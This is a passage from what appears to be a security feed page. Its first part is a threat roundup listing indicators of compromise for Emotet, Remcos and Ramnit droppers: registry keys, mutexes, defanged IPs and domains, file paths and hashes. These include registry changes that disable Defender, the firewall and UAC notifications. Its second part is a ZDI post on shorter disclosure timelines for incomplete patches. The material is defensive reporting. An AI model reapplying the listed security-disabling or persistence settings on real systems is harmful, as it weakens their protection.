<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32 Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64 Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32 Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32 Value Name: Start  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP Value Name: Start  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE Value Name: Start  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE Value Name: Start  23 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500  23 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 Value Name: EnableNotifications  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32 Value Name: Start  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64 Value Name: Start  23 <HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE Value Name: AccumulatedWaitIdleTime  23 
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE Value Name: RootstoreDirty  23 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE Value Name: AccumulatedWaitIdleTime  23 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE Value Name: RootstoreDirty  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC Value Name: Start  22 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64 Value Name: Type  22 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64 Value Name: Start  22 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE Value Name: Type  22 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE Value Name: Start  22 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND Value Name: Start  21 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}  18 Mutexes Occurrences kkq-vx_mtx63 23 kkq-vx_mtx64 23 kkq-vx_mtx65 23 kkq-vx_mtx66 23 kkq-vx_mtx67 23 kkq-vx_mtx68 23 kkq-vx_mtx69 23 kkq-vx_mtx70 23 kkq-vx_mtx71 23 kkq-vx_mtx72 23 kkq-vx_mtx73 23 kkq-vx_mtx74 23 kkq-vx_mtx75 23 kkq-vx_mtx76 23 kkq-vx_mtx77 23 kkq-vx_mtx78 23 kkq-vx_mtx79 23 kkq-vx_mtx80 23 kkq-vx_mtx81 23 kkq-vx_mtx82 23 kkq-vx_mtx83 23 kkq-vx_mtx84 23 kkq-vx_mtx85 23 kkq-vx_mtx86 23 kkq-vx_mtx87 23 *See JSON for more IOCs IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 107[.]22[.]125[.]105 7 3[.]217[.]206[.]46 4 Domain Names contacted by malware. 
Does not indicate maliciousness Occurrences ninite[.]com 21 www[.]bing[.]com 1 Files and or directories created Occurrences %CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 23 %CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 23 %ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 23 %ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 23 %SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 23 %SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 23 %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 23 %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 23 %System32%\FXSSVC.exe 23 %System32%\alg.exe 23 %System32%\dllhost.exe 23 %SystemRoot%\ehome\ehsched.exe 23 %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 23 %SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 23 %SystemRoot%\SysWOW64\dllhost.exe 23 %SystemRoot%\SysWOW64\svchost.exe 23 %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log 23 %SystemRoot%\SysWOW64\dllhost.vir 23 %SystemRoot%\SysWOW64\svchost.vir 23 %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat 23 %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock 23 %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat 23 %SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.lock 23 %SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngenservicelock.dat 23 %CommonProgramFiles(x86)%\microsoft shared\source engine\ose.vir 23 *See JSON for more IOCs #### File Hashes  137ad3b55addd7191c8c974beef6b65bae791bc4de1e86b7e2965b311d40e2d0 1cfd0fd601a0f5234ce72672ec9c6c866dca03836198d93a320ed5df0bddd7f8 1e831b6d0cabaa8b44de36c1b96dd6e54e295502eb171be4f87723212fe574ca 1f935627d9866da115f1aad78be290f60a639bec1a94d6b8397326eeb46c111b 30ffb87628211e78074a3a891b8bd173db6f2d74dc97e735ff386361cf29aee1 3f948d4350c566416101441adb1c00121bd835db40cc08c73a556b764458673d 
47934d4f40e9a5af0ee572a7e1e088d29d3bfd655d4aff26018a64118ad68a24 563c16cb752614726d350000fbf514a8b8d32a8074cd12c7545d6ff93f790ed9 591ae4985fd6993f580eae6f93f3e96f7c73c14dc3927e96223e8003f9ab3588 5cbd454095120231e23ca372fee8e9e76f34e3f5491f8ab10e8e5203e4c52570 6f0f5fda67646bc8def9c66497041528cd8ed7158a169c1b0787f59360c28ea8 7ec4a0246b5d33dfe811f4f34ab94a6b82d822196776afbe28a0f543ade8ad63 97d0aeeca4859c38984086ff1bef13c9bd11466131058fabda20dd1b21342f7a a2839faa3c7ecbff8afa71ca5787690e0e3eaeb36b899bab1926b19ce32b8c6d bcf2ae9a67fe974c02e95fbdd4edcce7df377a288c7586dae9d0b625aeedc93b c51d235b290424ad6baf08d67ab600a260200846a3f4b218e916933594b40537 d3d7dd910bd5e79fdb39d51aa83afaccdfd10538d30dd69bc7219a146e897361 d445c1ac4afae6cb028a2508c655271e3d69e07d9e016887d89d790c80fc0409 e23566aabaa7743da973840338829cc25d6936e8fcb5fb8d9b78b0ccac46c1ea e37b0661d4e4483048abcf0abba65060c78716672790e12bb0a768f04b18134b e48a371f7f5f3ad1cda0d16312f30846b6a12494967c8fba8de7f65a5673b1ff eb1ecc1ef099105b4882ccace3caf843ed1508b1463f8af6cc94adaa0181b721 ec1bc44db50911234444c575d91335113232ab5b1f6cad6acf5e52ff16ccd8fb  #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella N/A WSA N/A #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Dropper.Emotet-9961142-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 218 samples Registry Keys Occurrences <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: LanguageList  190 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: Type  64 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: Start  64 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: ErrorControl  64 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: DisplayName  64 
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: WOW64 (64)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: ObjectName (64)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (63)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: ImagePath (61)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: Description (60)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%systemroot%\system32\dot3svc.dll,-1103 (14)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @oleres.dll,-5013 (10)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%systemroot%\system32\browser.dll,-101 (9)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%SystemRoot%\system32\AxInstSV.dll,-104 (9)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%systemroot%\system32\dps.dll,-501 (9)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%SystemRoot%\ehome\ehrecvr.exe,-102 (8)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @appmgmts.dll,-3251 (8)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%SystemRoot%\system32\dhcpcore.dll,-101 (8)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%systemroot%\system32\appinfo.dll,-101 (8)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%SystemRoot%\System32\audiosrv.dll,-205 (7)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%systemroot%\system32\appidsvc.dll,-101 (7)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @comres.dll,-948 (7)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%SystemRoot%\System32\dnsapi.dll,-102 (7)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%systemroot%\system32\cscsvc.dll,-201 (7)
- <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @%SystemRoot%\System32\bthserv.dll,-102 (7)

IP Addresses contacted by malware.
Does not indicate maliciousness. Occurrences:

- 5[.]196[.]74[.]210 (82)
- 74[.]208[.]45[.]104 (82)
- 45[.]55[.]219[.]163 (82)
- 45[.]55[.]36[.]51 (82)
- 174[.]45[.]13[.]118 (82)
- 180[.]92[.]239[.]110 (82)
- 91[.]83[.]93[.]99 (82)
- 217[.]199[.]160[.]224 (78)
- 89[.]32[.]150[.]160 (78)
- 68[.]183[.]190[.]199 (78)
- 45[.]161[.]242[.]102 (78)
- 209[.]236[.]123[.]42 (78)
- 71[.]197[.]211[.]156 (78)
- 91[.]121[.]54[.]71 (78)
- 85[.]25[.]207[.]108 (58)
- 88[.]249[.]181[.]198 (58)
- 65[.]156[.]53[.]186 (58)
- 68[.]183[.]233[.]80 (58)
- 177[.]32[.]8[.]85 (58)
- 81[.]17[.]93[.]134 (58)
- 197[.]232[.]36[.]108 (58)
- 23[.]46[.]150[.]72 (30)
- 23[.]46[.]150[.]48 (27)
- 23[.]221[.]72[.]27 (13)
- 23[.]221[.]72[.]10 (6)

*See JSON for more IOCs*

Domain Names contacted by malware. Does not indicate maliciousness. Occurrences:

- apps[.]identrust[.]com (82)

Files and/or directories created. Occurrences:

- %SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> (35)
- %SystemRoot%\SysWOW64\printui (2)
- %SystemRoot%\SysWOW64\NlsLexicons0414 (2)
- %SystemRoot%\SysWOW64\utildll (2)
- %SystemRoot%\SysWOW64\NlsData000a (2)
- %SystemRoot%\SysWOW64\fthsvc (2)
- %SystemRoot%\SysWOW64\shlwapi (2)
- %SystemRoot%\SysWOW64\WcsPlugInService (2)
- %SystemRoot%\SysWOW64\NlsLexicons0002 (2)
- %SystemRoot%\SysWOW64\d3d8thk (1)
- %SystemRoot%\SysWOW64\instnm (1)
- %SystemRoot%\SysWOW64\cttune (1)
- %SystemRoot%\SysWOW64\tsbyuv (1)
- %SystemRoot%\SysWOW64\KBDSW (1)
- %SystemRoot%\SysWOW64\fc (1)
- %SystemRoot%\SysWOW64\rshx32 (1)
- %SystemRoot%\SysWOW64\KBDHE220 (1)
- %SystemRoot%\SysWOW64\WMADMOE (1)
- %SystemRoot%\SysWOW64\NlsData0002 (1)
- %SystemRoot%\SysWOW64\iprop (1)
- %SystemRoot%\SysWOW64\rastls (1)
- %SystemRoot%\SysWOW64\aecache (1)
- %SystemRoot%\SysWOW64\SMBHelperClass (1)
- %SystemRoot%\SysWOW64\KBDNO (1)
- %SystemRoot%\SysWOW64\mfc100 (1)

*See JSON for more IOCs*

#### File Hashes

- 0154a4e3faa4dafca324954364d049324d6fcc6b8a1c90cbae92cd41f8927c4e
- 01ea88880d59cd617d53bfd1849ad0c2023c9febc43b48579d06802c9b324d77
- 0222be0813e32c7a2c87a31482e33830a91b73a750aff3499da5caa100646607
- 0242673f6b5b086a61873f4773b8b7f119d025325f2724cb362b1151adccfc8b
- 02f7999d6693f08f5983effb8bee06145be3f7dc22ff1e5b745e8d0633fe19d6
- 038008283ccba00047b767169fd02554182310d7b32c6def8a3fc1c6a045daf1
- 0403b01de17d2130faa4eecf11111acf15bc672dfeb9394054e5aa05166b8289
- 044242411968ca1c92b3a645d7f470cf0cda1a220920da688558fde7f4108eb9
- 055014bbf3a21173e4e2d9fb22124d7d249bc8f8c748151197d6e985bdf06f67
- 05cf33a7202716161360fc0e6fd45091f9a290954ba26a64037745652fa4b487
- 066202dc95bd51220d42f603a030ef71527b8dc56e62200f0d175f09f3f89c27
- 06ee8bc6b3c35b3d3ea924f73db6da1df9061e69b487bad9718328f1d186f0c7
- 0780d91df0f27af4b00d51e531a1cf12d50bbb048a211e0b287820bd9313eab5
- 07c262357505c7bef31ebfe2bb6c13a3d386e38d262ba2bdbfb2e52c1bd066fd
- 080fc908405201cbf074d6343acf66ee3c4d57f231c399b87097f75b8ca7960f
- 08e6bfa50d4fe544c03474d1a23776762a47a0ceed44dbe5bbb6e09fce30b055
- 091b50c4a374f1fc1d15e81044c2b50f03fa7c3e8359eb09bb95dc25deeebd4d
- 098861c8b4411225b4fde8737ccb518052ef40c896ee4e42dfeecf322e56f07f
- 09c4a4a31a51590b27a82bcff450c29391d3dfde480df012f43020e858efb639
- 0b533cf67e6fd8298b62d3aaea82f07ad11c600fa8917f3b683a72da9ca2fa7e
- 0c33a1f3687e65daa8825856f309cc40ef97d0892ef7742a77355124e296b815
- 0ccab31b5610aac24a242c812f474ff24b8e345aa78fd4b7d0a92b690938f908
- 0cd25d45a5e31de0fc1b75ba65c5b43d934b60b7d07638aaa1ce0d83afd984ec
- 0d3fee19509a873e96a1b2559d9193cf046f7f35f49d16b180438d9df7da027f
- 0ea6a45d2ad1115ce7141f15693139b8bd9e5ffebb5a1321ab8c48e62d65fab9

*See JSON for more IOCs*

#### Coverage

Product / Protection:

- Secure Endpoint
- Cloudlock: N/A
- CWS
- Email Security
- Network Security
- Stealthwatch: N/A
- Stealthwatch Cloud: N/A
- Secure Malware Analytics
- Umbrella: N/A
- WSA

#### Screenshots of Detection

#### Secure Endpoint

#### Secure Malware Analytics

#### MITRE ATT&CK

### Win.Dropper.Remcos-9961392-0

#### Indicators of Compromise

IOCs collected from dynamic analysis of 14 samples.

Registry Keys. Occurrences:

- <HKCU>\SOFTWARE\POULUS (14)
- <HKCU>\SOFTWARE\POULUS\MICROMINIATURISER (14)
- <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS (14)
- <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS\TIVOLIET (14)
- <HKCU>\SOFTWARE\POULUS\MICROMINIATURISER, Value Name: Komplettes (14)
- <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS\TIVOLIET, Value Name: Fins (14)
- <HKCU>\SOFTWARE\[email protected] (7)
- <HKCU>\SOFTWARE\[email protected], Value Name: licence (7)
- <HKCU>\SOFTWARE\[email protected], Value Name: exepath (7)
- <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: ornamenterne (1)
- <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: Hyldetrs (1)
- <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: lnglidninger (1)
- <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: Vampirebat (1)
- <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: Dereferencing (1)
- <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: Sarkastisk (1)
- <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: Martyrologistic (1)

Mutexes. Occurrences:

- Remcos_Mutex_Inj (7)
- [email protected] (7)
- Global\916138a1-15e4-11ed-9660-00151792685a (1)

IP Addresses contacted by malware. Does not indicate maliciousness. Occurrences:

- 5[.]2[.]75[.]164 (7)
- 181[.]235[.]13[.]200 (4)
- 186[.]169[.]54[.]97 (3)

Domain Names contacted by malware.
Does not indicate maliciousness. Occurrences:

- colpatvalidacionnuevo[.]xyz (7)

Files and/or directories created. Occurrences:

- %HOMEPATH%\Desktop\Markedness.ini (14)
- %TEMP%\ns<random, matching '[a-z][A-F0-9]{1,4}'>.tmp (14)
- %TEMP%\ns<random, matching '[a-z][A-F0-9]{4}'>.tmp\System.dll (14)
- %TEMP%\logsflat458 (7)
- %TEMP%\logsflat458\sasgs527.dat (7)
- \TEMP\en-US\22d69844486d029467b528c89bf763a6.exe.mui (1)
- \TEMP\en-US\ef6731323cff411f303c2bd29b9f15c8.exe.mui (1)
- \TEMP\en-US\b2a7538d257a51b1a506b646c248fcbe.exe.mui (1)
- \TEMP\en-US\570979659276a2a985f97f7965f97f76.exe.mui (1)
- \TEMP\en-US\f231d436f8d62de3082ea791da78ed50.exe.mui (1)
- \TEMP\en\f231d436f8d62de3082ea791da78ed50.exe.mui (1)
- \TEMP\en\ef6731323cff411f303c2bd29b9f15c8.exe.mui (1)
- %TEMP%\Selenitic (1)
- %TEMP%\Dextroamphetamine (1)
- %TEMP%\Selenitic\Uncooping.exe (1)
- %TEMP%\Dextroamphetamine\Lobcokt.exe (1)
- \TEMP\en\22d69844486d029467b528c89bf763a6.exe.mui (1)
- %TEMP%\Tiki124 (1)
- %TEMP%\Tiki124\Unexpecting.exe (1)
- \TEMP\en\b2a7538d257a51b1a506b646c248fcbe.exe.mui (1)
- \TEMP\en\570979659276a2a985f97f7965f97f76.exe.mui (1)
- %TEMP%\Sekundrkommunens (1)
- %TEMP%\Giganter27 (1)
- %TEMP%\Sekundrkommunens\Unpracticability174.exe (1)
- %TEMP%\Giganter27\Spandauerne.exe (1)

*See JSON for more IOCs*

#### File Hashes

- 125b94822affbd4b1b67333905a91231c62e427334475ada0daa44d007e884c1
- 332cb82247db85cd4c772200938a7623c4161a15d680157cdc688b53aae2303a
- 3efb2166b220fd7d7e5df42739d998f6ed4c70fefdcb03b6a9b1810d6dcfcd77
- 42d77fbb29467078ade8ecba705a648d3d4aeacd5f6735a6d92d17cb55ff7049
- 6761e346725d0cfa3436b459176ff467f7b4a426af0559845032c912420747cd
- 72d9be63e832a89a04ffcfb48c30199d3461fe982bde962f57c7cf71e0f5f06a
- 8c420a6337376e20c987679a34e3d09194e504c444fbf50619328f5c0dda9217
- 942dcafe7a16cfdd1769048c73590ec2c29e9c76a9f6c46e6b6e88ac2220b0ef
- 9ead44844a24092afb456478686839852e04cd1ad8e081185ae432f1171baa1b
- a3ec71d27779875c7262d608c3c5e591fa7c12f0893e006bb6f7d2ad1d710142
- a742e0a1f7939fdaf5eb615bac3da040781bd19e84e3f647186314ecb6e0fa5e
- ce2ff79b4178d9b7f142001bc227753dd395fcd1a28a385bfa379e0857181467
- d52c22336b2e2efaeab6b8eb2be8726a36eaea553905b01102d9716d4c6184af
- e2deccb5d8cc1ec270d95501aaa7e53951bd7f89c2c0bcd50420bf94b7057675

#### Coverage

Product / Protection:

- Secure Endpoint
- Cloudlock: N/A
- CWS
- Email Security
- Network Security
- Stealthwatch: N/A
- Stealthwatch Cloud: N/A
- Secure Malware Analytics
- Umbrella
- WSA

#### Screenshots of Detection

#### Secure Endpoint

#### Secure Malware Analytics

#### MITRE ATT&CK

### Win.Dropper.Ramnit-9961396-0

#### Indicators of Compromise

IOCs collected from dynamic analysis of 26 samples.

Registry Keys. Occurrences:

- <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: AntiVirusOverride (26)
- <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: AntiVirusDisableNotify (26)
- <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: FirewallDisableNotify (26)
- <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: FirewallOverride (26)
- <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: UpdatesDisableNotify (26)
- <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: UacDisableNotify (26)
- <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM, Value Name: EnableLUA (26)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE, Value Name: EnableFirewall (26)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE, Value Name: DoNotAllowExceptions (26)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE, Value Name: DisableNotifications (26)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC, Value Name: Start (26)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND, Value Name: Start (26)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC, Value Name: Start (26)
- <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION, Value Name: jfghdug_ooetvtgk (26)
- <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: JudCsgdy (26)
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV, Value Name: Start (26)
- <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: Windows Defender (26)
- <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON, Value Name: Userinit (26)
- <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON, Value Name: Userinit (26)

Mutexes. Occurrences:

- qazwsxedc (26)
- {7930D12C-1D38-EB63-89CF-4C8161B79ED4} (26)

IP Addresses contacted by malware. Does not indicate maliciousness. Occurrences:

- 72[.]26[.]218[.]70 (25)
- 195[.]201[.]179[.]207 (25)
- 208[.]100[.]26[.]245 (25)
- 46[.]165[.]220[.]155 (25)
- 35[.]205[.]61[.]67 (25)
- 142[.]250[.]80[.]14 (25)
- 63[.]251[.]235[.]76 (25)
- 64[.]225[.]91[.]73 (25)

Domain Names contacted by malware. Does not indicate maliciousness. Occurrences:

- google[.]com (25)
- gjvoemsjvb[.]com (25)
- ahpygyxe[.]com (25)
- msoalrhvphqrnjv[.]com (25)
- rdslmvlipid[.]com (25)
- jpcqdmfvn[.]com (25)
- rrmlyaviljwuoph[.]com (25)
- maajnyhst[.]com (25)
- enbbojmjpss[.]com (25)
- oqmfrxak[.]com (25)
- tdccjwtetv[.]com (25)
- tpxobasr[.]com (25)
- xpdsuvpcvrcrnwbxqfx[.]com (25)
- fbrlgikmlriqlvel[.]com (25)
- boeyrhmrd[.]com (25)
- ugcukkcpplmouoah[.]com (25)
- gugendolik[.]com (25)

Files and/or directories created. Occurrences:

- %LOCALAPPDATA%\bolpidti (26)
- %LOCALAPPDATA%\bolpidti\judcsgdy.exe (26)
- %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe (26)

#### File Hashes

- 081742e8ed56a1a933e0507ccd536aaaf7242ac76d47a1a49626ee71c6756b53
- 0e372167303e500219b580a1a0367d2b69ab693e56934584e05cd963736bd463
- 10cef31349a4842546edbc5244d0d3aaed1e3c058008800c889abf5dc43ec343
- 127ee9c2897fb600dec742861451fdcf48820c200e15df7479542ed4232c0584
- 155b0301ce2f88c396fb7aa77cbc82c51a01660e6a74b63f7ba8dc8f023ea7e8
- 1e1773938b5bdd08be479ca9186a30d3fad83ea67ae905f391508ac543c2a38f
- 263351025d462b47660ea4bacd71ae1fd694de45a3d9bd5b14e58be1c4362d00
- 2e2ac92783031efdde48674b0ed3362c81fac9b25756ee39af1629f39309ccc2
- 340833674362d0c01995cc8657a95a628fddeb853272b6d89dfcf98bbe106cbe
- 39b9cfa59e688e1d56e6499b80637f321f777d022dff4a9eaf691ba9a1e9cc86
- 3cc065b26f54c993606649d1679bca81068c10e3727fdf9ee811fa6a17c1ebad
- 41b21c4398fa089007a9a34aac8a3f5d14b61814ff036b555cc6b09c8efd81aa
- 4b183d215f86d026ef2bac0cf5dd4b28146612d52206e358169b0f1d3209c76d
- 4ed2cf991c4ed810cdbb5d567d33e1f1d94218ae43c506d6b33d2acc35009598
- 57fa2ea50d27a8cc8feec2867a680ae6e9a0d1a47d117733a73db86da3bf8416
- 5de59e2cc183ce5f34b2ca66fbd1edce54b3a6208ae7621c49cbd78835bdcbf5
- 699e006e4a6871ca898aacf55f84c36ea43d8b9e421b71dd20a0fe5a06378d66
- 6a216904abbf52246819029936c7e8705f50c61ba0ee6a62d8a14881cfca0a33
- 77aeccd3d538a6effc3623344a331d5190c747489a5cc511d4e7d973e879ff8a
- 77c966ca4088e8b918b4e40ed539a510fad2a2631ff17d1a1b01a1670e6fa400
- 79622d5b5ef3c93d32bcaaba64cfbbe4a88ec7f56d1f7f2160b9219321058f29
- 8c878b6608dba85c650ffda157cc14d885f14559e8c6b38a5ae0be85d5a73001
- 8d5f17bf76258cf83d0678cef645b0fa2f0b6df56858fb0ec4cab8894b59b316
- a1574bfff6cebf0757ab5a7fc7634b7956fed8943e088b87820ff13be65789c4
- af0aa7289a5770da3a158d0f0fbea1c5073b6ca4f6fe5a7bebdde44a55ca2c2e

*See JSON for more IOCs*

#### Coverage

Product / Protection:

- Secure Endpoint
- Cloudlock: N/A
- CWS
- Email Security
- Network Security
- Stealthwatch: N/A
- Stealthwatch Cloud: N/A
- Secure Malware Analytics
- Umbrella
- WSA

#### Screenshots of Detection

#### Secure Endpoint

#### Secure Malware Analytics

#### MITRE ATT&CK

# New Disclosure Timelines for Bugs Resulting from Incomplete Patches

11 August 2022 at 19:00

Today at the Black Hat USA conference, we announced some new disclosure timelines. Our standard 120-day disclosure timeline for most vulnerabilities remains, but for bug reports that result from faulty or incomplete patches, we will use a shorter timeline. Moving forward, the ZDI will adopt a tiered approach based on the severity of the bug and the efficacy of the original fix. The first tier will be a 30-day timeframe for most Critical-rated cases where exploitation is detected or expected. The second level will be a 60-day interval for Critical- and High-severity bugs where the patch offers some protections.
Finally, there will be a 90-day period for other severities where no imminent exploitation is expected. As with our normal timelines, extensions will be limited and granted on a case-by-case basis.

Since 2005, the ZDI has disclosed more than 10,000 vulnerabilities to countless vendors. These bug reports and subsequent patches allow us to speak from vast experience when it comes to the topic of bug disclosure. Over the last few years, we've noticed a disturbing trend: a decrease in patch quality and a reduction in communications surrounding the patch. This has resulted in enterprises losing their ability to accurately estimate the risk to their systems. It's also costing them money and resources as bad patches get re-released and thus re-applied.

Adjusting our disclosure timelines is one of the few areas that we as a disclosure wholesaler can control, and it's something we have used in the past with positive results. For example, our disclosure timeline used to be 180 days. However, based on data we tracked through vulnerability disclosure and patch release, we were able to lower that to 120 days, which helped reduce vendors' overall time-to-fix. Moving forward, we will be tracking failed patches more closely and will make future policy adjustments based on the data we collect.

